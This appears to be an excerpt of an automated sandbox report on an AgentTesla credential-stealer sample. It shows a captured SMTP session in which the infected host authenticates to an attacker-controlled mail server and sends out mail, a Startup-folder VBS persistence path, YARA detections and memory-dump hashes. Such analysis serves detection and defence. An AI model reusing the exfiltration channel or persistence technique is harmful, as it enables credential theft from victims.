Dec 23, 2024 09:08:58.036871910 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | MAIL FROM:<sendxambro@educt.shop>
Dec 23, 2024 09:08:58.421793938 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 250 2.1.0 Ok
Dec 23, 2024 09:08:58.422261000 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | RCPT TO:<ambro@educt.shop>
Dec 23, 2024 09:08:58.809870005 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 250 2.1.5 Ok
Dec 23, 2024 09:08:58.810125113 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | DATA
Dec 23, 2024 09:08:59.227374077 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 354 End data with <CR><LF>.<CR><LF>
Dec 23, 2024 09:08:59.228282928 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | .
Dec 23, 2024 09:08:59.723548889 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 250 2.0.0 Ok: queued as 979D760954
Dec 23, 2024 09:09:13.472297907 CET | 587 | 49744 | 162.254.34.31 | 192.168.2.4 | 220 server1.educt.shop ESMTP Postfix
Dec 23, 2024 09:09:13.472508907 CET | 49744 | 587 | 192.168.2.4 | 162.254.34.31 | EHLO 305090
Dec 23, 2024 09:09:13.853276968 CET | 587 | 49744 | 162.254.34.31 | 192.168.2.4 | 250-server1.educt.shop
250-PIPELINING
250-SIZE 204800000
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 CHUNKING
Dec 23, 2024 09:09:13.853657007 CET | 49744 | 587 | 192.168.2.4 | 162.254.34.31 | AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
Dec 23, 2024 09:09:14.247155905 CET | 587 | 49744 | 162.254.34.31 | 192.168.2.4 | 334 UGFzc3dvcmQ6
Dec 23, 2024 09:09:14.768778086 CET | 587 | 49744 | 162.254.34.31 | 192.168.2.4 | 235 2.7.0 Authentication successful
Dec 23, 2024 09:09:14.769032001 CET | 49744 | 587 | 192.168.2.4 | 162.254.34.31 | MAIL FROM:<sendxambro@educt.shop>
Dec 23, 2024 09:09:15.150863886 CET | 587 | 49744 | 162.254.34.31 | 192.168.2.4 | 250 2.1.0 Ok
Dec 23, 2024 09:09:15.151937008 CET | 49744 | 587 | 192.168.2.4 | 162.254.34.31 | RCPT TO:<ambro@educt.shop>
Dec 23, 2024 09:09:15.533761978 CET | 587 | 49744 | 162.254.34.31 | 192.168.2.4 | 250 2.1.5 Ok
Dec 23, 2024 09:09:15.538384914 CET | 49744 | 587 | 192.168.2.4 | 162.254.34.31 | DATA
Dec 23, 2024 09:09:15.917639971 CET | 587 | 49744 | 162.254.34.31 | 192.168.2.4 | 354 End data with <CR><LF>.<CR><LF>
Dec 23, 2024 09:09:15.926793098 CET | 49744 | 587 | 192.168.2.4 | 162.254.34.31 | .
Dec 23, 2024 09:09:16.429907084 CET | 587 | 49744 | 162.254.34.31 | 192.168.2.4 | 250 2.0.0 Ok: queued as 54F4A600C0
Dec 23, 2024 09:10:35.578607082 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | QUIT
Dec 23, 2024 09:10:35.960896015 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 221 2.0.0 Bye
Dec 23, 2024 09:10:52.187871933 CET | 49744 | 587 | 192.168.2.4 | 162.254.34.31 | QUIT
Dec 23, 2024 09:10:52.570508003 CET | 587 | 49744 | 162.254.34.31 | 192.168.2.4 | 221 2.0.0 Bye


                                                                                                Target ID:0
                                                                                                Start time:03:08:45
                                                                                                Start date:23/12/2024
                                                                                                Path:C:\Users\user\Desktop\Ref#20203216.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Ref#20203216.exe"
                                                                                                Imagebase:0xe30000
                                                                                                File size:154'592 bytes
                                                                                                MD5 hash:9F9DF5620E05DA5BBF797B8531DA35AB
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1756518799.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1781401675.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1774875467.00000000041FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1774875467.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:03:08:51
                                                                                                Start date:23/12/2024
                                                                                                Path:C:\Users\user\Desktop\Ref#20203216.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Ref#20203216.exe"
                                                                                                Imagebase:0x960000
                                                                                                File size:154'592 bytes
                                                                                                MD5 hash:9F9DF5620E05DA5BBF797B8531DA35AB
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2955905751.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2955905751.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2955905751.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2955905751.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                Target ID:3
                                                                                                Start time:03:09:01
                                                                                                Start date:23/12/2024
                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iulue.vbs"
                                                                                                Imagebase:0x7ff769c20000
                                                                                                File size:170'496 bytes
                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:03:09:02
                                                                                                Start date:23/12/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\iulue.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\iulue.exe"
                                                                                                Imagebase:0x640000
                                                                                                File size:154'592 bytes
                                                                                                MD5 hash:9F9DF5620E05DA5BBF797B8531DA35AB
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1948082008.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.1929062673.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1948082008.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1948082008.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 37%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:7
                                                                                                Start time:03:09:08
                                                                                                Start date:23/12/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\iulue.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\iulue.exe"
                                                                                                Imagebase:0xa30000
                                                                                                File size:154'592 bytes
                                                                                                MD5 hash:9F9DF5620E05DA5BBF797B8531DA35AB
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2952721059.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2956983411.0000000002ECC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2956983411.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2956983411.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2956983411.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 326226b0fffc5bd40c8f5400db00f5fc35717d1096a58b1ce38e0d43d7dc418a
                                                                                                  • Instruction ID: eed6f609df13991e101d5e716ddbeeb6fdff64491fef8ccacf943239110cb03d
                                                                                                  • Opcode Fuzzy Hash: 326226b0fffc5bd40c8f5400db00f5fc35717d1096a58b1ce38e0d43d7dc418a
                                                                                                  • Instruction Fuzzy Hash: 8F71F5B4E10219DFCB04DFA8D4986EDBBB2FF89341F108429D525AB264DB345D46CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d2716af4fa47f9dba8a630f953bb88b01b8b389cebc6eae9c8f45ba7b94eb55b
                                                                                                  • Instruction ID: e089923e2639d0c4ee8e588add5328ad58719c031c5e402a5a2da9e9849076a0
                                                                                                  • Opcode Fuzzy Hash: d2716af4fa47f9dba8a630f953bb88b01b8b389cebc6eae9c8f45ba7b94eb55b
                                                                                                  • Instruction Fuzzy Hash: 3F41BF30B4020A9FDB58FF6994007AEBBA2EFC5301B54C5B9C50A9B294DF359D8387A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d84a1bbe3f0ad35fb9ca7c21a1a3726a6ce81c7215e20192f9af9434c0f3c6bb
                                                                                                  • Instruction ID: 78ca8b2917d68e61dbd327c02df1127c000bd5c2dc5a7b14148e1f6efe440cb9
                                                                                                  • Opcode Fuzzy Hash: d84a1bbe3f0ad35fb9ca7c21a1a3726a6ce81c7215e20192f9af9434c0f3c6bb
                                                                                                  • Instruction Fuzzy Hash: 1031E370B80105DFDB18FF24E4007BABBB6EBC4351B9484B9CA06D7244D7359C838BA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 00e36fa96c8913fdc24d1c38e0638cad6d357a1353e8882a080915bb6794b5ed
                                                                                                  • Instruction ID: 2955b1b2c3ca8db4bf403512a320f0fbc6c87a337f521216c80c737ba091a38c
                                                                                                  • Opcode Fuzzy Hash: 00e36fa96c8913fdc24d1c38e0638cad6d357a1353e8882a080915bb6794b5ed
                                                                                                  • Instruction Fuzzy Hash: 883179B0D00249AFDB15DFA9C880AEEFFF6AF48314F248469E508AB351DB749941CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a488d5068b1d8f9df9e5ad303c96fb8cf77609cc26be2caa7620e3b5c07f9fd3
                                                                                                  • Instruction ID: 7d4ff4a1cda3c2d35bfdc0a67aa5996bd9e9d95106931afbb0e59b622f263405
                                                                                                  • Opcode Fuzzy Hash: a488d5068b1d8f9df9e5ad303c96fb8cf77609cc26be2caa7620e3b5c07f9fd3
                                                                                                  • Instruction Fuzzy Hash: 6431433138C3419FE722AA7DD84436BFBE6EB01366F04486AE442C6293E665C883C361
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5d8814440864526651b1b6621f43bb80d2ed71ebf785da862070d158e7990e44
                                                                                                  • Instruction ID: ada55762c280821662f20f543d91eb71c60039295795044b05ab89ad646bfc8c
                                                                                                  • Opcode Fuzzy Hash: 5d8814440864526651b1b6621f43bb80d2ed71ebf785da862070d158e7990e44
                                                                                                  • Instruction Fuzzy Hash: 003119B0D0024CAFDB14DFAAC594ADEFFF6AF48350F248469E909AB250DB749945CF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6f4094569ac7b53f2eba4c9757de9093c755c2e18f888712f67361620d1b85a9
                                                                                                  • Instruction ID: 627ef765074dca99e256602a34856d0229dc3ad836548ffe33e020751df510fb
                                                                                                  • Opcode Fuzzy Hash: 6f4094569ac7b53f2eba4c9757de9093c755c2e18f888712f67361620d1b85a9
                                                                                                  • Instruction Fuzzy Hash: F53127B0D45209DFEB60EFA9D0487AEBBF2FB89305F1480A9C515A7281D7744A45CF12
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756127745.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_173d000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 73dff6cb70e967ac68f1da7cf822e61970972f30c294b5b67ee8910052356256
                                                                                                  • Instruction ID: d4482daea999df8eb773243b2a90c7903e8c94bc6e0830095f2b8891565b4b6a
                                                                                                  • Opcode Fuzzy Hash: 73dff6cb70e967ac68f1da7cf822e61970972f30c294b5b67ee8910052356256
                                                                                                  • Instruction Fuzzy Hash: 7921F1B15042049FCB21DF58D984B26FBA5FBC4714F64C5A9E9090A247C336D81ACAA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2c212e5fbe755e99a5a51a3ade5ab4d635d1e693140d51a8ca937268198909eb
                                                                                                  • Instruction ID: 94ea0bb15867b3da7381add89c7767efcd6647f3f8808647104e853ee871cdbf
                                                                                                  • Opcode Fuzzy Hash: 2c212e5fbe755e99a5a51a3ade5ab4d635d1e693140d51a8ca937268198909eb
                                                                                                  • Instruction Fuzzy Hash: CB1129743493811FC70367399864869FFB5FFC625135441BAF405CB653EA749D08CB52
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7767153f108250f20e3b62153761badff63d3de897e4cb4446c956b58a0d3783
                                                                                                  • Instruction ID: f640af1344c21f3d81cedb7d780b30de593dd300523cf026fe00a4da405ca793
                                                                                                  • Opcode Fuzzy Hash: 7767153f108250f20e3b62153761badff63d3de897e4cb4446c956b58a0d3783
                                                                                                  • Instruction Fuzzy Hash: 8321A4B8A00209DFCB04EFB8D9459BEBBB2FFC8311B108569D405A7756CB35AD06CB51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 48b0600c5aa7d3120d1fed0a013989d03c532cea8be6d790a09f67701dd2befa
                                                                                                  • Instruction ID: 50b15d25e0a7a6e3fd5bb40d81976a5ab0e9600e79f5907e24b5a740c273485f
                                                                                                  • Opcode Fuzzy Hash: 48b0600c5aa7d3120d1fed0a013989d03c532cea8be6d790a09f67701dd2befa
                                                                                                  • Instruction Fuzzy Hash: 5F112770A492415FC726676C8800B3ABBE5EFEA310F8545E6E046DB396D7308C43C761
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 19a6fe4c7abcc341268a4864925c8f6372c3128b464f021889c92f2fe5bbf2fa
                                                                                                  • Instruction ID: 4465c3aea93d760a643b3fe5e2c5812c8af02c201a98e3fb49b62d5189e8846f
                                                                                                  • Opcode Fuzzy Hash: 19a6fe4c7abcc341268a4864925c8f6372c3128b464f021889c92f2fe5bbf2fa
                                                                                                  • Instruction Fuzzy Hash: 22110BB8B45206CFC704EF68C8849BDBBB2FFC8321B108965D408973A5CA306D06CB51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0a06d3affc40bff69c261beef4413639d8bf9aed88e82b90691382f80b60e904
                                                                                                  • Instruction ID: 0b4fc3572ea1cffe1a6c26146aa5f7acd02fe1dcb02692988ed251ad4c4c527b
                                                                                                  • Opcode Fuzzy Hash: 0a06d3affc40bff69c261beef4413639d8bf9aed88e82b90691382f80b60e904
                                                                                                  • Instruction Fuzzy Hash: BB3162B4E092288FDBA4CF28C994A99B7F1FB49610F1480E9D80CA7350D738AE81CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756127745.000000000173D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0173D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_173d000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f5cca3b6083d3cd9d5895b52ac11f54ed2289ca6e68c0d87637972eb0d922851
                                                                                                  • Instruction ID: a7026240d75a4691811b9ae8481649d0b64ce94f725d2220ab7fc6b0bb92acb6
                                                                                                  • Opcode Fuzzy Hash: f5cca3b6083d3cd9d5895b52ac11f54ed2289ca6e68c0d87637972eb0d922851
                                                                                                  • Instruction Fuzzy Hash: 9D11AC76504284CFDB22DF54D9C4B16FF62FB84624F24C2AAD8490B657C33AD41ACBA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9bd0e731b3ebaf3667e2152ac7bdd3106c785a976cf0475965b1bdbd8050412a
                                                                                                  • Instruction ID: 0a72c572491944d1f000a40eda96b5ec67b0f8c380777cca36d135ab5f1821bb
                                                                                                  • Opcode Fuzzy Hash: 9bd0e731b3ebaf3667e2152ac7bdd3106c785a976cf0475965b1bdbd8050412a
                                                                                                  • Instruction Fuzzy Hash: C611B2B8A00209DFCB04EFA8D8849AEB7F2FFC8311B108578E405AB355CB35AD01CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 92c411f17eb32e234239ecd82f157f8585300f506c57e8b75fcf7a79f0a47bcc
                                                                                                  • Instruction ID: 7217252d49872c5dd070a3030bbcc3ddca97356a33d7e3702196c5d6658b092d
                                                                                                  • Opcode Fuzzy Hash: 92c411f17eb32e234239ecd82f157f8585300f506c57e8b75fcf7a79f0a47bcc
                                                                                                  • Instruction Fuzzy Hash: DB01D26134C6864FC72AB764D51447ABBA2EFC131174AC9BED086CB557D928EC42C351
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1782455416.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7710000_Ref#20203216.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756050114.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_15dd000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2b31ae8ecab90563bb3f3e0d7ed65c36cc05295425ac341a2c4fe6d3b0cd2173
                                                                                                  • Instruction ID: b1bbfb57e65cc6ec6b47a4eff18f28003add36c81fc11ab1cf8881f5590fd2e1
                                                                                                  • Opcode Fuzzy Hash: 2b31ae8ecab90563bb3f3e0d7ed65c36cc05295425ac341a2c4fe6d3b0cd2173
                                                                                                  • Instruction Fuzzy Hash: B901A771008384DAE7204A5DDC84B6ABFE8EF51365F19C899ED094E2C2C778A840C771
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0ed13f6966a770b94a67ca616e166fa5ecb730e76f56b0d472b0634c87db764a
                                                                                                  • Instruction ID: 51e0d7b32c2a516cc858671e2032884712bc87d26b1eb1434b4651dd8f48ff28
                                                                                                  • Opcode Fuzzy Hash: 0ed13f6966a770b94a67ca616e166fa5ecb730e76f56b0d472b0634c87db764a
                                                                                                  • Instruction Fuzzy Hash: A301D170B451059FC324A69DC804B2AF6D6FBE9321F9480A5E506C7394CB708D4383A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9a1d315b44e2e8aef6d645767b4720cd6b77f5dfca6a51aa2b16b9e6c9efa5b3
                                                                                                  • Instruction ID: f892c5a11536486a87e4747b0b3ab62bbf32373265d9fb7eac0266f8c955d935
                                                                                                  • Opcode Fuzzy Hash: 9a1d315b44e2e8aef6d645767b4720cd6b77f5dfca6a51aa2b16b9e6c9efa5b3
                                                                                                  • Instruction Fuzzy Hash: 05016D713002055FC715AB7ED85895ABBEAFBC86623108539F809CB751FE34ED048B90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1756367125.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1780000_Ref#20203216.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3f0c0cea7cba77d5f610c77148b0fa821bf197b10ed9490af8d169297a6f4707
                                                                                                  • Instruction ID: c812762852a25ec459697ac04a71501b124c169c5e8172e09046cdccdd306f16
                                                                                                  • Opcode Fuzzy Hash: 3f0c0cea7cba77d5f610c77148b0fa821bf197b10ed9490af8d169297a6f4707
                                                                                                  • Instruction Fuzzy Hash: 1D011AB4680205CFD715EBA9C8586AEFBF5BF48210F540069E401DB3A5DBB09D02CB41
                                                                                                  Memory Dump Source
